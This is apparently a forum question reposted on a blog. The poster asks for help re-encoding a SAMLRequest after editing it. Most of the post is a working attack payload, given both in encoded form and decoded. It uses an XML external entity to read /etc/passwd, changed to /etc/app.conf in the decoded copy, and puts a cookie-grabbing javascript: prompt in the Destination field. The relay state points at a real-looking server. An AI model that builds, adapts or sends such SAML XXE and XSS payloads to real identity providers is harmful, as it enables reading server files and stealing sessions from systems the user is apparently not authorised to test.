I'm just about to throw the laptop outside the nearest window, I'm doing a SAMLRequest, the below encoded format works without any issues, however, I want to do some changes then encode and send, Here's the original encode that I'm trying to alter
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI%2FPjwhRE9DVFlQRSBkb2MgWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdID4KPHNhbWxwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1scD0idXJuOm9hc2lzOm5hbWVzOnRjOlNBTUw6Mi4wOnByb3RvY29sIiB4bWxuczpzYW1sPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YXNzZXJ0aW9uIiBJRD0iZGZmNTc4YzMwNDlmNWJhMTAyMjNkZjgyMDEyM2ZjY2NiYzEzNGU3NTIwIiBWZXJzaW9uPSIyLjAiIElzc3VlSW5zdGFudD0iMjAxNC0wNS0wOFQxMTo1ODozM1oiIERlc3RpbmF0aW9uPSJqYXZhc2NyaXB0OnByb21wdChkb2N1bWVudC5kb21haW4sZG9jdW1lbnQuY29va2llKSI%2BIDxzYW1sOklzc3Vlcj4meHhlOzwvc2FtbDpJc3N1ZXI%2BIDxzYW1scDpFeHRlbnNpb25zPiA8VUk%2BPFVSTD4meHhlOzwvVVJMPjwvVUk%2BIDwvc2FtbHA6RXh0ZW5zaW9ucz4gPGRzOlNpZ25hdHVyZSB4bWxuczpkcz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC8wOS94bWxkc2lnIyI%2BIDxkczpTaWduZWRJbmZvPjxkczpDYW5vbmljYWxpemF0aW9uTWV0aG9kIEFsZ29yaXRobT0iaHR0cDovL3d3dy53My5vcmcvMjAwMS8xMC94bWwtZXhjLWMxNG4jIi8%2BIDxkczpTaWduYXR1cmVNZXRob2QgQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjcnNhLXNoYTEiLz4gPGRzOlJlZmVyZW5jZSBVUkk9IiNkZmY1NzhjMzA0OWY1YmExMDIyM2RmODIwMTIzZmNjY2JjMTM0ZTc1MjAiPjxkczpUcmFuc2Zvcm1zPjxkczpUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwLzA5L3htbGRzaWcjZW52ZWxvcGVkLXNpZ25hdHVyZSIvPjxkczpUcmFuc2Zvcm0gQWxnb3JpdGhtPSJodHRwOi8vd3d3LnczLm9yZy8yMDAxLzEwL3htbC1leGMtYzE0biMiLz48L2RzOlRyYW5zZm9ybXM%2BPGRzOkRpZ2VzdE1ldGhvZCBBbGdvcml0aG09Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvMDkveG1sZHNpZyNzaGExIi8%2BPGRzOkRpZ2VzdFZhbHVlPjVCV2l5WDl6dkFDR1I1eStOQjJ3eHVYSnRKRT08L2RzOkRpZ2VzdFZhbHVlPjwvZHM6UmVmZXJlbmNlPjwvZHM6U2lnbmVkSW5mbz48ZHM6U2lnbmF0dXJlVmFsdWU%2BUzRMaENVT0IweWxUNGNqWFVWQWJudnJCakJCenliYXh2V0hUR3c5Sm5Sc3lVQjFNZXRSSytWSHZWL00zUTROWDBER1VORlhsQ1pSM3NNMm1zUU9BaGJqWnhrS1FDTlVCaWc1Ni8wM3Bnc1hscFdKRmhuQkw4bTBzUlJaQmR1ZjRRZEhuL2h4eHl2QUt6YWRQUTVubUlQbUNQcE8xQ1FzUlVUTXJ0LzEzVklFPTwvZHM6U2lnbmF0dXJlVmFsdWU%2BIDwvZHM6U2lnbmF0dXJlPjwvc2FtbHA6QXV0aG5SZXF1ZXN0Pg%3D%3D&response_url=http%3A%2F%2Fhax&RelayState=aHR0cHM6Ly9uczM2NTMyOS5vdmgubmV0Ojg0NDMv&RefererScheme=https&RefererHost=https%3A%2F%2FX.com%3A8443&RefererPort=8443
Here's what I got so far after nearly 2 days trying to figure how to decode the original (did it by simply decoding url then decoding base64)
SAMLRequest=<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [ <!ENTITY xxe SYSTEM "file:///etc/app.conf"> ] >
<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="dff578c3049f5ba10223df820123fcccbc134e7520" Version="2.0" IssueInstant="2014-05-08T11:58:33Z" Destination="javascript:prompt(document.domain,document.cookie)"> <saml:Issuer>&xxe;</saml:Issuer> <samlp:Extensions> <UI><URL>&xxe;</URL></UI> </samlp:Extensions> <ds:Signature xmlns:ds="http://ift.tt/uq6naF"> <ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://ift.tt/11kTCUR"/> <ds:SignatureMethod Algorithm="http://ift.tt/zf1Wx4"/> <ds:Reference URI="#dff578c3049f5ba10223df820123fcccbc134e7520"><ds:Transforms><ds:Transform Algorithm="http://ift.tt/A1C4L2"/><ds:Transform Algorithm="http://ift.tt/11kTCUR"/></ds:Transforms><ds:DigestMethod Algorithm="http://ift.tt/yuvO4a"/><ds:DigestValue>5BWiyX9zvACGR5y+NB2wxuXJtJE=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>S4LhCUOB0ylT4cjXUVAbnvrBjBBzybaxvWHTGw9JnRsyUB1MetRK+VHvV/M3Q4NX0DGUNFXlCZR3sM2msQOAhbjZxkKQCNUBig56/03pgsXlpWJFhnBL8m0sRRZBduf4QdHn/hxxyvAKzadPQ5nmIPmCPpO1CQsRUTMrt/13VIE=</ds:SignatureValue> </ds:Signature></samlp:AuthnRequest>&response_url=http://hax&RelayState=https://ns365329.ovh.net:8443/&RefererScheme=https&RefererHost=https://X.com:8443&RefererPort=8443
Problem is that when I re- encode after doing my changes(reading a different file), it's no where near the original encoded one, I tried url encoding then base 64 decode to no avail.
Appreciate any input, really!
No comments:
Post a Comment